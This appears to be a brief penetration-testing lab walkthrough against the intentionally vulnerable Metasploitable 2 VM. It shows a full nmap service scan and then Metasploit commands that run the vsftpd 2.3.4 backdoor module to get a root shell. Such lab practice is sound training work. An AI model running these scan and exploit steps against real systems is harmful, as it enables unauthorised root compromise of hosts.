ftp-anon: Anonymous FTP login allowed (FTP code 230) Metasploitable 2
Nmap Command:
root@kali:~# nmap -v -A 192.168.32.134
root@kali:~# nmap -v -A 192.168.32.134
Result:
Scanning 192.168.32.134 [1000 ports]
Discovered open port 111/tcp on 192.168.32.134
Discovered open port 80/tcp on 192.168.32.134
Discovered open port 23/tcp on 192.168.32.134
Discovered open port 5900/tcp on 192.168.32.134
Discovered open port 25/tcp on 192.168.32.134
Discovered open port 21/tcp on 192.168.32.134
Discovered open port 139/tcp on 192.168.32.134
Discovered open port 22/tcp on 192.168.32.134
Discovered open port 53/tcp on 192.168.32.134
Discovered open port 445/tcp on 192.168.32.134
Discovered open port 3306/tcp on 192.168.32.134
Discovered open port 6000/tcp on 192.168.32.134
Discovered open port 2049/tcp on 192.168.32.134
Discovered open port 8180/tcp on 192.168.32.134
Discovered open port 514/tcp on 192.168.32.134
Discovered open port 5432/tcp on 192.168.32.134
Discovered open port 1524/tcp on 192.168.32.134
Discovered open port 1099/tcp on 192.168.32.134
Discovered open port 6667/tcp on 192.168.32.134
Discovered open port 2121/tcp on 192.168.32.134
Discovered open port 513/tcp on 192.168.32.134
Discovered open port 512/tcp on 192.168.32.134
Completed SYN Stealth Scan at 15:14, 0.13s elapsed (1000 total ports)
Initiating Service scan at 15:14
Scanning 22 services on 192.168.32.134
Completed Service scan at 15:17, 149.25s elapsed (22 services on 1 host)
Initiating OS detection (try #1) against 192.168.32.134
NSE: Script scanning 192.168.32.134.
Initiating NSE at 15:17
Completed NSE at 15:18, 78.81s elapsed
Initiating NSE at 15:18
Completed NSE at 15:18, 1.04s elapsed
Nmap scan report for 192.168.32.134
Host is up (0.00032s latency).
Not shown: 978 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Issuer: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2010-03-17T14:07:45
| Not valid after: 2010-04-16T14:07:45
| MD5: dcd9 ad90 6c8f 2f73 74af 383b 2540 8828
|_SHA-1: ed09 3088 7066 03bf d5dc 2373 99b4 98da 2d4d 31c6
|_ssl-date: 2017-08-29T03:37:05+00:00; -4d15h40m42s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
53/tcp open domain ISC BIND 9.4.2
| dns-nsid:
|_ bind.version: 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 49963/udp mountd
| 100005 1,2,3 56762/tcp mountd
| 100021 1,3,4 42223/tcp nlockmgr
| 100021 1,3,4 60764/udp nlockmgr
| 100024 1 40722/tcp status
|_ 100024 1 43226/udp status
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open tcpwrapped
1099/tcp open java-rmi Java RMI Registry
1524/tcp open shell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info:
| Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 10
| Capabilities flags: 43564
| Some Capabilities: SwitchToSSLAfterHandshake, SupportsTransactions, ConnectWithDatabase, Support41Auth, LongColumnFlag, SupportsCompression, Speaks41ProtocolNew
| Status: Autocommit
|_ Salt: !/g:.v+opby\?gfM/CA[
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Issuer: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2010-03-17T14:07:45
| Not valid after: 2010-04-16T14:07:45
| MD5: dcd9 ad90 6c8f 2f73 74af 383b 2540 8828
|_SHA-1: ed09 3088 7066 03bf d5dc 2373 99b4 98da 2d4d 31c6
|_ssl-date: TLS randomness does not represent time
5900/tcp open vnc VNC (protocol 3.3)
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ VNC Authentication (2)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
8180/tcp open unknown
MAC Address: 00:0C:29:B0:10:B0 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 0.030 days (since Sat Sep 2 14:35:03 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=200 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -4d15h40m42s, deviation: 0s, median: -4d15h40m42s
| nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| METASPLOITABLE<00> Flags: <unique><active>
| METASPLOITABLE<03> Flags: <unique><active>
| METASPLOITABLE<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2017-08-28T23:37:04-04:00
TRACEROUTE
HOP RTT ADDRESS
1 0.31 ms 192.168.32.134
NSE: Script Post-scanning.
Go to the MSF Console:
Command:
msf > search vsftpd
Result:
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4 Backdoor Command Execution
Command:
msf > use exploit/unix/ftp/vsftpd_234_backdoor
Result:
msf exploit(vsftpd_234_backdoor) >
Command:
msf exploit(vsftpd_234_backdoor) > show options
msf exploit(vsftpd_234_backdoor) > set rhost 192.168.32.134
msf exploit(vsftpd_234_backdoor) > show options
Result:
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.32.134 yes The target address
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(vsftpd_234_backdoor) > exploit
[*] 192.168.32.134:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.32.134:21 - USER: 331 Please specify the password.
[+] 192.168.32.134:21 - Backdoor service has been spawned, handling...
[+] 192.168.32.134:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (192.168.32.128:45125 -> 192.168.32.134:6200) at 2017-09-02 16:19:55 -0400
whoami
root
hostname
metasploitable
No comments